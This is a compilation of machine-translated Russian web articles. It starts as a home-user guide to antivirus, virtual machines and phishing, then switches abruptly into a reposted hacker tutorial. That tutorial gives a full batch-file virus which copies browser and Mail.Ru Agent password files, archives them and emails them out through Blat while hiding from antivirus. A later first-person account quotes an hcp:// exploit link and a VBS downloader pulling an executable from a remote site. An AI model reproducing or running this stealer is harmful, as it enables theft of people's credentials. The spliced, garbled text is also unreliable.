Computer literacy, help and repair

Viruses can steal passwords from your pc. The virus steals passwords from VKontakte and Odnoklassniki! Carefully! Scanning for viruses

In order not to become a victim, you need to keep the Internet safe and make the necessary efforts to protect your computer!

In this article, or rather, instructions will be expressed, I, Vladimir Belev (formerly an employee of the Moscow Instrument-Making Technical School in the positions of a technician, engineer and teacher), will tell you about 3 simple possible options for protecting a computer by an ordinary user and will answer as far as possible to everything your questions in the comments at the end of the article.

When you know where to spread the feather bed, it’s better to spread it!

Quick jump to the article

Introduction

When surfing the Internet from a computer, you may encounter such phenomena as infection of your computer with various malicious programs, which can entail completely different consequences, from damage to files and disruption of normal, stable operation. operating system, until a complete system failure and even theft of important personal data!

And even, in addition to directly infecting your computer, you can simply become a victim of scammers who can steal your very important data, such as logins and passwords from various sites, as well as information about your bank cards and any other information, the loss of which can turn into sudden charges funds of your accounts.

Therefore, when working on the Internet, you need to be, first of all, extremely careful, try not to visit suspicious and dangerous sites, and also use protection tools for your computer.

Below I will show and tell you what options are there to protect against various types of threats when working on the Internet from your computer ...

Option number 1. Applying Simple Antivirus Protection (When Using Windows)

This is perhaps the most relevant, simple and widespread method of protecting your computer from various threats on the Internet, including some configurations of antivirus products, I also have in my arsenal the protection of your personal data and additional protection when making payments on the Internet.

Antiviruses, as well as various anti-spyware, anti-trojans and other utilities from the same category, can be paid and free and, of course, are developed by different manufacturers. In my own skin, I experienced both, and with increasing experience, practice and various experiments, I came to the unequivocal conclusion that free antiviruses can provide decent protection for your computer.

And when to choose paid and when free antivirus? My answer is that it's easier to use free ones.

Paid antiviruses differ for the most part only in the presence of a large number of additional functionality, for example, a protected storage for passwords, a built-in program for cleaning a computer, a browser, for updating installed on a computer software... Additional security elements can also be built into it, such as a firewall, which protects your computer from various hacker attacks and, in general, allows you to block access to the Internet for certain programs and according to certain rules.

But all this, if required, can be found separately in free options and I think there is simply no need to pay for it.

To date, I have settled on the free Avast antivirus, which I have been using for more than 4 years in a row.

During these 4 years, I have never picked up any serious infection from the Internet, which would lead even to minor problems in the operation of my system and the programs installed on it. Of course, all this is not without taking into account such a simple thing as a generally cautious "walk" through the sites, without clicking on links in suspicious letters in the mail, without entering various data on suspicious and untrusted sites, in general, without visiting sites that do not inspire trust!

Below I will show you how to install and configure the free version of Avast antivirus to work with a high degree of protection.

Modern versions of Windows already have standard antivirus protection called Windows Defender, but for greater security, especially for newbie users, I would still recommend using a third-party antivirus (when installed, the standard protection will turn off itself).

Installing an antivirus

You can download the antivirus from the official website at the link:

On the page, click the button “Download free antivirus” (may be called a little differently).

If this does not happen, you may be redirected to another page, where you will need to confirm the download or select the version of the antivirus (free or paid).

Run the downloaded file to begin installation.

Do not press the install button right away, but press “Settings”!

Now you need to select those antivirus components that will be installed.

In the image below, the most important and mandatory components of the antivirus are circled in yellow, which will directly protect your computer (scan files on your computer in real time, files downloaded from the Internet, mail, and also analyze system behavior for suspicious actions). Do not remove these check marks!

Everything else can be set as in the same image above. I would recommend just such a set of components, because some of the rest are useless, and the other part will not work in free version antivirus. Or you can turn off something that you consider unnecessary for yourself.

You can read what kind of component it is for by hovering the mouse cursor over the question icon next to the required component.

Click Install.

After the installation is complete, click “Continue” several times in different windows.

In the last window after installation, you will be prompted to install the antivirus on your Android smartphone or tablet. You can always do this directly from the device itself, or you can install it immediately, through this window.

To opt out, click “No, I don’t want” below.

Remember that any antivirus, especially on a smartphone, is an additional load on it (the device may start to slow down), and the rate of battery discharge also increases! From my experience, I will say that catching a virus on Android is not so easy, it is much more difficult than on Windows, if you do not visit dangerous sites and for the entire time of using smartphones with Android OS, I have never been infected, leading to breakdown or instability of work devices.

This completes the installation!

Free license activation

After installing the antivirus, it is better to immediately activate your free license, because after 30 days the antivirus may start signaling you about the expiration date. There will be annoying warnings and soon the antivirus may turn off altogether. However, activation is a matter of a minute and a subscription is given immediately for a year, after which you can extend it again for a year and so on ad infinitum.

Open the main window of the antivirus and click “Activate”.

Click “Select” under the column “ Avast Free Antivirus ”(free protection).

In the next window, stop installing the trial version of paid protection:

That's the whole activation. If the activation period approaches the end, the program will warn you and you will just need to repeat the procedure.

Configuring antivirus

In order for the antivirus to perform its work reliably, as well as to disable various unnecessary "chips", I recommend making some settings.

Open “Settings” from the main antivirus window.

Program settings

This is to prevent possible “smart” malware from starting to disable your antivirus or manage its settings.

Go to the “Password” subsection, enable the “Protect Avast with a password” function and set any password. Even the simplest will do. And you can set the settings for protected areas just like in the image below:

Security settings

Open the "Components" tab and here you can configure each protection component separately.

The settings that were initially set can be left as they are, with them the antivirus does not overload the system and at the same time protects well. I recommend only changing the sensitivity level by setting “High” (initially “normal”). To do this, open the settings for each component one by one and set “High” in the “Sensitivity” tab. Don't forget to save your changes!

May also come in handy in the settings!


Scanning for viruses

No matter how good the antivirus is and no matter how it is configured correctly, there is always the possibility of missing something on the computer. Therefore, you need to regularly (once a month, for example) conduct a full scan of your computer for threats to keep your system in good condition, as well as more secure.

To scan your computer with Avast antivirus, go to the "Protection" section and select "Antivirus".

Before running a full scan of your computer, I recommend setting up this type of scan a little. To do this, click on the gear in the corner of the block with this type of scan.

In the “Scanning” - “File types” section, check the “Scan all files” checkbox to scan as thoroughly as possible (but take longer).

In the “Sensitivity” section, set the sensitivity to high and enable the “Scan whole files” option.

In the "Archivers" section, check "All archivers".

Option number 2. Work in whole or in part through a virtual machine (when using Windows)

This protection method is as follows. A special program is installed on your computer through which you install a new operating system (whatever you want) and can work in it while in your real system.

This operating system, which will work for you through a special program, is a virtual machine, that is, as a virtual computer.

What does it do? A virtual machine is a separate environment from your real system, and if viruses get there, they will remain there without causing any harm to your real system.

A virtual machine (called a "virtual machine") requires good performance from your computer. Simply put, a computer must be powerful! Of course, a lot also depends on the system that you will install as a virtual machine, because, for example, Windows XP requires several times less computer resources than modern Windows 10. If your computer is weak, you will not be able to work normally in a virtual machine, so your real system may slow down and not cope with some ordinary tasks.

What kind of computer do you need to work with a virtual machine? Sometimes it's easier to just pick up and check. Those. put a virtual machine, allocate the required amount for it random access memory and see if it is normal or uncomfortable to work in it. It is better to have a processor from the Core i line or similar ones from AMD. RAM from 4 GB, because even already old windows 7 requires 2 GB for normal operation. memory. Accordingly, if you have less than 4 GB on your computer. RAM, you can forget about the virtual machine).

Based on the above, you can use a virtual machine in 2 versions:

    Perform most of your actions in it, that is, “walk” on the Internet, download something.

    To do only some actions in the virtual machine, for example, visit sites that you are not sure of the reliability, download files that you are not sure are safe, or install all sorts of unknown programs.

I would not use the first method, since it is simply inconvenient to spend most of the time in a virtual machine. And secondly, for comfortable work in a virtual machine (just like in a regular system), you need a very powerful computer, and this is without taking into account the fact that some tasks can be performed in parallel in a real system.

Installing VMware Workstation Player to Create and Work with Virtual Machines

VMware Workstation Player for working with virtual machines will only run on computers with 64-bit Windows! Now, in the overwhelming majority of cases, this version of Windows is installed on computers. Either way, you can just try installing.

You can download the program from the official website by clicking on the link:

On the page that opens, click the “Download” button opposite the version for Windows (for Windows 64-bit Operating Systems) and the program will start downloading to your computer.

After the installation file is downloaded, run it.

In the first installation window, click Next.

At one of the installation stages, check the box “Enhanced Keybourd Driver” and click “Next”:

Enabling this option means that an extended keyboard driver will be installed for virtual machines and it is better to install it just in case.

In one of the installation windows, uncheck the "Help Improve VMWare Workstation 12 Player" option, and leave the first option enabled:

The first option means that the program will automatically check for updates and if any a new version, then you can immediately update to it. The second option is to help program developers by sending anonymous information about the operation of this program from their computer.

That's it, the installation is complete.

Now run the program and you will see a window like this:

Here you need to select the first item, as in the image above, and enter your E-Mail address. This is only necessary so that you can use the program for free. After specifying your E-Mail, click "Continue".

In the next window, click "Finish":

The program window will start.

Creating a virtual machine

Now in the main window of the program, click "Create a New Virtual Machine" to create a new virtual machine:

Now we have reached the stage where it is necessary to choose from where, from which file or disk the operating system will be installed as a virtual one. The window will have 2 options: install from CD / DVD disc (Installer disc) or install from an image file stored on your computer (Installer disc image file). Choose the first option if you have your own CD / DVD with the OS you want to install as a virtual one:

For example, you have a disk with Windows 7 and you want to install this system as a virtual one. Then insert the disc with this system into your computer and choose the first option.

However, the operating systems for installation can also be stored in a special file on your computer called an "image". Then you can install the operating system as a virtual machine directly from this file. Here is an example of a Windows XP image file:

VMWare Workstation Player supports image files in the ".ISO" format, so if you have an ISO image file with an operating system, the easiest way to install a virtual machine is from it. And then choose the second option in the current window:

Using the "Browse" button, you can select just the desired image file with the operating system.

After choosing the desired option, click the "Next" button below.

Any operating system can be installed as a virtual one, i.e. any Windows system, any Linux or any others!

I recommend installing Windows 7, because, for example, the oldest Windows XP is no longer supported for a long time and many programs may not work correctly in it, and many will not work at all. And newer ones (Windows 8 and 10) require more performance from your computer to function properly.

In the next window, we are asked to pre-specify the key for installing the operating system, specify the username and password:

After all, installing an operating system into a virtual machine will be no different from installing a real OS on your computer. The only difference is that the system will be installed in the window virtually, and not on your real one. HDD... But in that window, I recommend leaving only the username, which will most likely be set automatically (taken from your real OS). The key and other parameters, if necessary, are easier to specify already during the OS installation. So in that window, just click Next to continue.

You will probably see a warning window that you did not specify a key. Click "Yes":

In the next window, in the first field you need to specify the name of the virtual machine that you are creating, and in the second field - the location of the virtual machine files on your computer.

You can name it whatever you like, usually named after the name of the OS you will be installing. The main thing is that you yourself understand where your OS is, if you suddenly install and work with several virtual OS in the future. Those. do not call it like this: "1234", because then you yourself will not understand what kind of virtual machine you have with that name until you start it.

You can choose any location of the virtual machine on your computer, that is, any folder or disk in your real system. It is in the selected folder that the files (there will be many of them) will be located that are responsible for starting the virtual machine.

Please note that the virtual machine will take up a lot of space! Depends on the system being installed.

When you have specified the name and location, click Next.

In the next window, you need to indicate the volume of your hard disk, which will be allocated for the work of the created virtual machine. This is a very important step!

As I said before, the virtual machine is practically no different from your real OS. She will also have her own hard disk only virtual.

And the volume of the hard disk of the virtual OS will be equal to the volume of your real hard disk that you allocate for the virtual machine.

Everything here will depend on what operating system you install as virtual. If, for example, Windows XP, then it does not require a lot of hard disk space and it will have enough somewhere 10-15 GB.

But modern Windows operating systems: 7, 8, 10 require a decent amount of free disk space for their work, at least 30 GB, or better - more (depending on what the virtual machine will be used for).

And in the first field of the current window, you need to specify how much of your real hard disk you will allocate for the virtual machine being created.

As I said, for example I will set a 30-day trial Windows version XP. For this system, 15 GB will suffice. the volume of the virtual disk.

Please note that your real hard disk should have at least as much free space as you allocate for a virtual machine!

Having checked that option, we indicated that there is no need to divide the virtual hard disk into several files, on which the virtual OS will run, let it be in one file. If we had chosen the second option “Split virtual disk into multiple files”, then the virtual hard disk would be divided into several files.

In the next window, you will receive information about the settings of the created virtual machine. We can click “Finish” right now to start the installation of the virtual machine, but we will not do this now.

Let's move on to the additional settings of the virtual machine in order to understand another extremely important setting and press the "Customize Hardware" button for this:

An additional window with settings on several tabs will open. We are only interested in the "Memory" tab, on which the amount of RAM allocated for the virtual machine of your computer is configured.

In this window, you need to specify the amount of your real RAM that will be allocated for the operation of the virtual machine.

Again, it all depends on which operating system you are installing. If it is Windows XP, then it will be able to work with only 128 MB of memory, although it will slow down a lot.

Better to allocate 1-2 GB for it. RAM. If you are installing Windows 7, 8 or 10 as a virtual machine, then I recommend allocating at least 2 GB. random access memory.

But there is one more thing. If your computer has so little RAM, then you can't allocate much for a virtual system!

If the computer has only 2 GB of memory (such a computer is very weak today), then you are unlikely to allocate more than 512 MB (megabytes) of memory for a virtual machine, because if you allocate more, your main system can start to slow down hard. Consider this!

In general, if your computer is weak, it’s easier not to bother with virtual machines.

You will return to the window with information about setting up your virtual machine and it's time to start directly installing the virtual machine!

Make sure the "Power on this virtual machine after creation" checkbox is checked so that the installation starts immediately and click "Finish":

The installation of the virtual OS you configured will start. First, windows will appear, notifying about the connection of some of your real computer hardware to the virtual machine, as well as windows with various insignificant information. Just check the box "Do not show this hint again" in these windows and click "OK":

Well, then the installation of the virtual OS will go directly. Using Windows XP as an example, it looks like this:

Installing a system as a virtual machine does not differ from the actual process of installing this system on a computer.

After installing the operating system as a virtual one, it will start immediately. It all looks something like this (i.e. the operating system in the VMWare program window):

Immediately after starting the system, the installation of additional tools will automatically start in it. This is primarily necessary so that you can easily drag files from the real system to the virtual OS window or vice versa, and you can also freely resize the window with the virtual machine.

Important nuances of working with virtual machines


Option number 3. Use for work (on an ongoing basis) one of the operating systems Linux or MacOS

In addition to the most popular Windows operating systems in the world, there are also analogues. The most popular analogs are Linux and MacOS systems.

Linux is a free operating system that anyone can freely download from the Internet and install on their computer.

MacOS is the factory system on all Apple computers (Macbooks).

One very important feature unites both of these systems - they are much safer than familiar to many Windows. That is why work in these systems, I attributed to the 3rd option for safe work on a computer.

Working in Linux or MacOS, you don't even need to use antivirus software! There is definitely a risk of infection, but it is minimal compared to Windows, especially since the vast majority of various viruses, Trojans and other threats are developed for computers running Windows, and once these files get on Linux or MacOS, they will simply be harmless.

Should you switch to Linux or stay on Windows?

It's up to you to decide! But I can say that these are fundamentally different systems, similar to Windows only in some features and nothing more. They have a completely different interface; a lot of other programs that are not in Windows and are in these systems (and vice versa); for some programs you will have to look for analogues (for example, there is no Adobe Photoshop for Linux); in general, they are completely different in terms of the structure of the system.

Therefore, if you are a beginner, with a computer that is not quite "you", but have already adapted to work in Windows, then a complete transition to Linux or MacOS can be a real problem for you. For experienced users, but who have been working only in Windows for many years, the transition to Linux will not do without nuances, a lot of questions and misunderstanding of some things.

If this is the case, you will probably find it easier to work on Windows by applying the security measures described in this tutorial. Moreover, Linux and MacOS will not be fully protected from theft of personal data, such as passwords for websites, bank card and account data, even taking into account their security from viral threats.

Because the users themselves are to blame for stealing data, because of their inexperience, carelessness, since it is enough to accidentally enter a not fake site, enter a username and password there (thinking that you are entering a familiar site that you need) and that's all, data from the attackers! This is just one example of how data can be stolen due to user carelessness.

Memo! We must not forget

It is important to know that no matter what protection you use when working on your computer, in order to protect yourself from viruses that break the system and personal data, from theft of important data, from hacking and everything else, you will not be able to 100% ensure a safe Internet experience. if you independently expose yourself to risk, due to inexperience, ignorance, inattention.

The simplest example. Someone on the Internet asked you to drop the password from your Email and you, trusting the person, send. Then this person disposes of your mail as he pleases, he can at least delete all letters or do nasty things on your behalf. What in this case will the protection that you apply to work on the Internet do? Nothing at all!

Whether it's the most advanced antivirus, a virtual machine, or working in a secure Linux system or another system. All this will not help in any way, because in this case you yourself transferred your data to the attacker and this happens all the time, as a rule, due to excessive trust, due to inexperience and carelessness of users.

I will give an example of user carelessness, which leads to theft of personal data.

Suppose you want to log into your VKontakte social network account. Seemingly, as usual, go to the site of this social network, but do not even pay attention to the fact that the site address is slightly different from the real one.

The original address of this social. Network is vk.com, and you got to the site vc.com, which, for example, has exactly the same design as that of the VKontakte site.

So, going to this fake, fraudulent site, you ignore anything, enter your username and password to enter your account. And then oops! Your data, namely your login and password, will already be in the hands of the intruders! And why? Simple carelessness, probably inexperience. In this case, again, no means of protection will help. Antivirus, of course, can also warn about a phishing site, but not always, because this fake site could have appeared the other day and has simply not been included in the database.

And there are a huge number of such examples ...

Therefore, when surfing the Internet, always be on the lookout, attentive and careful. Here are some guidelines.

Actually treat viruses, it is not a very difficult operation to pay specialists a lot of money for this work. To protect your computer from viruses, or in case of infection, you can return your computer to a "healthy" state by removing malicious programs yourself, choosing a good antivirus program and observing some rules. Take at least two of the most important ones: The first is to regularly update the anti-virus databases. The second is to completely scan your computer for viruses once a month.

So, with that, I think it's clear that malware removal is done with antivirus software. They are paid and free, I told about free methods in the following article:

And now what is a malware or a virus in another way?

Computer virus or malware is a program, the main purpose of which is: causing harm to the computer, damage to user data, theft or deletion of personal information, deterioration of the computer and much more.

To date malware can be classified into several types according to their effect on the computer.

  • Classic viruses.
  • Trojans.
  • Spies.
  • Rootkits.
  • Adware.

Let's take a closer look at each type of malware.

Classic viruses Are malicious programs that can infect a computer, for example, via the Internet. And the essence of such viruses is self-propagation. Such viruses copy themselves, copy files and folders that are on the infected computer. They do this with the aim of infecting the data so that their recovery is impossible in the future. This virus tries to damage all data on the computer by entering its code into all files, starting with the system files and ending with the user's personal data. Most often, the salvation, on such an infected computer, is.

Trojan horse Is a serious type of virus. Trojans are written by cybercriminals for a specific purpose, for example, stealing information from computers, or stealing passwords, and so on.

The Trojan is divided into two parts. The first part, called the Server, is kept by the attacker, and the second, the Client part, is distributed to all possible corners of the Internet and in other places. If the client part of the malicious program enters a computer, this PC becomes infected and the Trojan starts sending various information to the attacker in disguise.

The Trojan can also perform various operations on the computer at the request of the server (the attacker), steal passwords, infect documents and files with malicious code.

Spies, are somewhat similar to Trojans. But they have the main difference, and it lies in the fact that spies do not harm the files of the system and the user. Spyware quietly get into the computer and spy. They can steal passwords or even save absolutely everything that you enter from the keyboard.

Spyware is the most intelligent type of virus and can even send files from an infected computer. A spy knows a lot of information about an infected PC: what system is installed, what antivirus you use, what browser you use the Internet from, what programs are installed on the computer, and so on. Spyware is one of the most dangerous malware out there.

Rootkits Are not viruses in themselves. But rootkits are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer was infected with a spyware virus at the same time as a rootkit. And the rootkit will try to hide the spy from your antivirus and operating system. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, trojans) from the eyes of our antivirus for a long time!

Adware Is another type of malicious software. This is a less dangerous program, and its essence is to spin ads on your computer in all sorts of ways in different places. Adware does not do any harm and does not infect or spoil files. But you also need to protect yourself from this type of virus.

These are the types malware exists. To protect your computer from viruses, we need a good antivirus. I talked about that in another article, and now we will continue the topic of describing viruses and protection schemes for your computer.

Previously, viruses did not have a specific purpose, they were written for interest and the developer did not set a specific goal. Now viruses are the most complex algorithms, the essence of which is most often theft of money and data. Trojans are usually designed only to steal passwords and other important data.

By the way, whether your computer was attacked by viruses can be distinguished by some signs:

  • Programs do not work correctly or stop working altogether.
  • The computer started to slow down, work slowly.
  • Some files get corrupted, refuse to open.

Very often, such signs can become a sign of a computer virus infection, but fortunately not always.

It should be noted that most often one particular virus can infect different types of files. Therefore, even after the computer has been cured of a strong virus attack, the most correct formatting of the partitions will be.

Antivirus programs will help you to protect yourself from viruses, as I said above. Today, anti-virus programs have features that are enough to repel almost all malicious programs that spread on the Internet. But for maximum virus protection an important role is played by a properly selected and configured antivirus program for full "combat" performance. I recommend that you read the article about. But if you don’t have time, I’ll name the best anti-virus programs for you right here. Today, these are:

  • Kaspersky
  • Avast
  • Dr.Web
  • NOD32

I think there is plenty to choose from.

Good luck and excellent virus protection.

In this article I will describe how quickly and without much difficulty it is possible to write and make a virus that steals files with passwords and sends it all to the mailbox.
Let's start with the fact that the virus will be written in bat "e (CMD, you can take the main commands), that is, in a plain text file and will be executed using the standard built-in Windows" command line "interpreter.
In order to write such a virus, you need to know the exact storage location of those files that it will steal, Blat components that can be downloaded from the off site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code there:

@echo off md% systemroot% \ wincs md% SystemDrive% \ pass \ md% SystemDrive% \ pass \ opera \ md% SystemDrive% \ pass \ Mozilla \ md% SystemDrive% \ pass \ MailAgent \ md% SystemDrive% \ pass \ MailAgent \ reg attrib% systemroot% \ wincs + h + s + r attrib% SystemDrive% \ pass + h + s + r copy / y "% systemroot% \ blat.exe" "% systemroot% \ wincs \ blat.exe" copy / y "% systemroot% \ blat.dll" "% systemroot% \ wincs \ blat.dll" copy / y "% systemroot% \ blat.lib" "% systemroot% \ wincs \ blat.lib" CD / D% APPDATA% \ Opera \ Opera \ copy / y wand.dat% SystemDrive% \ pass \ opera \ wand.dat copy / y cookies4.dat% SystemDrive% \ pass \ opera \ cookies4.da regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins2 regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent_3.reg" HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins3 CD / D% APPDATA% Xcopy Mra \ Base% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y / E> nul Xcopy Mra \ Update \ ver.txt% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y> nul cd% AppData% \ Mozill a \ Firefox \ Profiles \ *. default \ copy / y cookies.sqlite% SystemDrive% \ pass \ Mozilla \ cookies.sqlite copy / y key3.db% SystemDrive% \ pass \ Mozilla \ key3.db copy / y signons.sqlite % SystemDrive% \ pass \ Mozilla \ signons.sqlite copy / y% Windir% \ Rar.exe% SystemDrive% \ pass \ Rar.exe> ​​nul del / s / q% SystemRoot% \ Rar.exe% SystemDrive% \ pass \ rar.exe a -r% SystemDrive% \ pass \ pass.rar% SystemDrive% \ pass \ copy / y% SystemDrive% \ pass \ pass.rar% systemroot% \ wincs \ pass.rar cd% systemroot% \ wincs% systemroot % \ wincs \ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren * .rar pass.rar% systemroot% \ wincs \ blat.exe -body FilesPassword -to [email protected] -attach% systemroot% \ wincs \ pass.rar rmdir / s / q% SystemDrive% \ pass rmdir / s / q% systemroot% \ wincs del / s / q% systemroot% \ blat. exe del / s / q% systemroot% \ blat.dll del / s / q% systemroot% \ blat.lib attrib + a + s + h + r% systemroot% \ wind.exe EXIT cls

I will not write out a lot of the code of the batink itself.
@echo off - hides the body of the batinka (so it is not needed, well, anyway)
md% systemroot% \ wincs - creates a wincs folder in the Windows system folder, regardless of which drive it is installed on or how it is named.
md% SystemDrive% \ pass \ - creates a pass folder on the drive where Windows is installed.
md% SystemDrive% \ pass \ opera \ - creates a folder opera where wand.dat and cookies4.dat from Opera browser(up to 11 * versions, the opera stores its passwords in the wand.dat file)
md% SystemDrive% \ pass \ Mozilla \- creates a Mozilla folder where files from the Mozilla browser will be copied (cookies.sqlite, key3.db, signons.sqlite) in which passwords are stored.
md% SystemDrive% \ pass \ MailAgent \- creates a MailAgent folder into which files containing the history of correspondence and registry keys (containing passwords) from the Mail Agent will be copied.
md% SystemDrive% \ pass \ MailAgent \ reg- creates a reg folder
attrib% systemroot% \ wincs + h + s + r- puts attributes on the wincs folder, thereby hiding it from view.
attrib% SystemDrive% \ pass + h + s + r- the same as above.
copy / y "% systemroot% \ blat.exe" "% systemroot% \ wincs \ blat.exe"- copies the blat.exe file from the upload location to the wincs folder
copy / y "% systemroot% \ blat.dll" "% systemroot% \ wincs \ blat.dll"- copies the blat.dll file from the upload location to the wincs folder
copy / y "% systemroot% \ blat.lib" "% systemroot% \ wincs \ blat.lib"- copies the blat.lib file from the upload location to the wincs folder
CD / D% APPDATA% \ Opera \ Opera \ - goes to the opera folder where the files with passwords (and not only) from the opera are located.
copy / y wand.dat% SystemDrive% \ pass \ opera \ wand.dat- copies the wand.dat file to the opera folder
copy / y cookies4.dat% SystemDrive% \ pass \ opera \ cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins2- exports the registry key magent_logins2 where the password is stored to the reg folder
regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins3- exports the registry key magent_logins3 where the password is stored to the reg folder
CD / D% APPDATA% - go to the AppData folder
Xcopy Mra \ Base% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y / E> nul- copies the contents of the Mra \ Base folder to the MailAgent folder
Xcopy Mra \ Update \ ver.txt% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y> nul- copies the ver.txt file to the MailAgent folder
cd% AppData% \ Mozilla \ Firefox \ Profiles \ *. default \- go to the folder with the Mozila browser profile
copy / y cookies.sqlite% SystemDrive% \ pass \ Mozilla \ cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy / y key3.db% SystemDrive% \ pass \ Mozilla \ key3.db- copies the key3.db file to the Mozilla folder
copy / y signons.sqlite% SystemDrive% \ pass \ Mozilla \ signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy / y% Windir% \ Rar.exe% SystemDrive% \ pass \ Rar.exe> ​​nul- copies the component of the archiver WinRar Rar.exe to the pass folder
del / s / q% SystemRoot% \ Rar.exe- removes the archiver component from the Windows folder
% SystemDrive% \ pass \ rar.exe a -r% SystemDrive% \ pass \ pass.rar% SystemDrive% \ pass \- archive the contents of the pass folder
copy / y% SystemDrive% \ pass \ pass.rar% systemroot% \ wincs \ pass.rar copy the created archive to the wincs folder
cd% systemroot% \ wincs - go to the wincs folder
% systemroot% \ wincs \ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program for sending the archive by specifying the data for authorization and sending the letter. Do not forget to indicate your data from the mailbox from which the letter with the archive will be sent.
ren * .rar pass.rar - just in case the archive did not accept the wrong name during the course, we will rename it to pass.rar
% systemroot% \ wincs \ blat.exe -body Files Password -to [email protected] -attach% systemroot% \ wincs \ pass.rar- we indicate to which postal address the letter will be sent and send it.
rmdir / s / q% SystemDrive% \ pass- delete the pass folder
rmdir / s / q% systemroot% \ wincs- delete the wincs folder
del / s / q% systemroot% \ blat.exe
del / s / q% systemroot% \ blat.dll- remove Blat components from the Windows folder.
del / s / q% systemroot% \ blat.lib- remove Blat components from the Windows folder.
attrib + a + s + h + r% systemroot% \ wind.exe- we put on ourselves the attributes thereby hiding ourselves from the eyes.
EXIT - we end the batink process and exit.
cls - clear the output of any lines in the intreper.
We copied it, save it as wind.bat and compile it to exe using the Bat to exe converter program, then we put everything together, that is, we take the components of the Blat program and the component of the WinRar archiver (you can download it) and glue it into one executable file, or with which one by some program, the path for unloading all files should be% SystemRoot% or% WindowsDir% or% windir%.
As a result, we get a virus that will not be scorched by antiviruses and will send an archive with files to your mail. Files that come to the mail can be decrypted using multi-password-recovery, though not all, but only wand.dat from the opera and then if it has not been updated to version 11 *. All other files can be decrypted by replacing them with your own.
On this I think we can finish, if you have any questions, do not hesitate to ask.
Thank you for your attention, all the best!
© SwAp TheHackWorld.in

From my childhood I was tormented by the question: "How does a computer get infected with viruses." Finally I found out, felt it for myself. Why not tell the world how this very entertaining process actually goes.

In order not to write a manual on infection, otherwise a lot of people will use it, God forbid, so I will delete some parts of the scripts.

Already everyone, probably, is fed up with the phrases about the "leakiness" of MS Windows, but, nevertheless, it remains the most widespread system on the planet Earth. Or maybe the system is so full of holes because of its prevalence.

And now, the attack was carried out on one of the vulnerabilities of the Windows XP system, namely the Windows Help Center.

The beginning, as usual, was a long time ago (already in 2010), you can read about this on the very well-known resource xakep.ru (at the very bottom of the page).

It all started simply.

IE issued a request to open a program from the tjyre .info resource. Obviously a virus! But it’s interesting !!

Go to the site http://tjyre.info does not give any information, except that the site is under construction (at the time of the posting, it just does not work at all, apparently screwed up).

How do I know what was meant for me on my computer? Elementary - you need to consider where the link leads.

hcp: // services / search? query = anything & topic = hcp: //system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% % A ... %% A %% A %% A ..% 5C ..% 5Csysinfomain.htm% u003fsvr =

As my ignorance tells me, the link to the virus file is hidden behind numbers.

Through simple transformations, it turns out that under the numbers there is a copying of a script with the name of the l .vbs file to the system folder of my computer, and its subsequent launch.

The address where the script is located on the network:


http://tjyre.info/games/hcp_vbs.php?f=17

The file that opens contains the following text:

« w = 3000: x = 200: y = 1: z = false: a = " http://tjyre.info/u.php?e=7&f=17": Set e = Createobject (StrReverse (" tcejbOmetsySeliF.gnitpircS ")): Set f = e.GetSpecialFolder (2): b = f &" \ exe.ex2 ": b = Replace (b, Month (" 2010-02 -16 ")," e "): OT =" GET ": Set c = CreateObject (StrReverse (" PTTHLMX.2LMXSM ")): Set d = CreateObject (StrReverse (" maertS.BDODA ")) ... Removed for stupid reasons ...g =o.GetFile (b):g.Delete»

The text is quite simple:

    we see the date 02/16/2010 (it turns out that some kind of masking of the virus is carried out by date, they still adopted it, that it is necessary to mask it)

    we see the commands turned inside out (using the reverse), with the help of which the virus file flies into our computer.

Safely sit down fresh readme.exe. What does this guest bring us? Surely a lot of fun.

Launching readme. exe was very successfully blocked by the program antiwinlocker ... For which she is honored and praised. But since I still want to see what happens, the defenders will have to be asked to retire for a while.

The first launch of the virus was not remarkable, which is understandable, the virus penetrated and hid until the next boot.

Reboot and silence again. Mystery!!

We'll have to look in secret corners.

Find the lsass.exe file (imitating the system process) in the C: \ Documents and Settings \ Admin \ Application Data folder.

In the registry, respectively, we find the key:

"userinit" = "C: \\ WINDOWS \\ system32 \\ userinit.exe, C: \\ Documents and Settings \\ Admin \\ Application Data \\ lsass.exe" as expected.

But that's not all!

In the folder "C: \ WINDOWS \ system32 \ drivers \ etc" there is a magic hosts file, in which the virus adds about a dozen magic lines (please see the WHOLE hosts file):

These lines are used to redirect from sites classmates and vkontakte to a very specific site, and also arrange a complete bummer for Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).

What do we see when we go to the villain's site? We see the main page of classmates, but if you enter a username and password, they will go straight to the "villain". And if you click on some link, we get a very cool request for "account validation". Moreover, the text clearly states: " The service is not available to subscribers in some regions of Megafon". Such a serious approach to business that I did not immediately enter the meaning of the phrase.

A malicious virus has appeared, which changes some settings (modifies the hosts file) on the user's computer, as a result of which you end up in a completely different place where you were going, although outwardly everything looks as usual. Here you enter your password and hand over your name and password to the villains. So that's it.

Read the details and how to fight under the cut.

"VKontakte": 50,000 passwords in the public domain (updated)

A computer virus for the Windows operating system has appeared on the Internet, which hacks the accounts of users of the VKontakte social network.

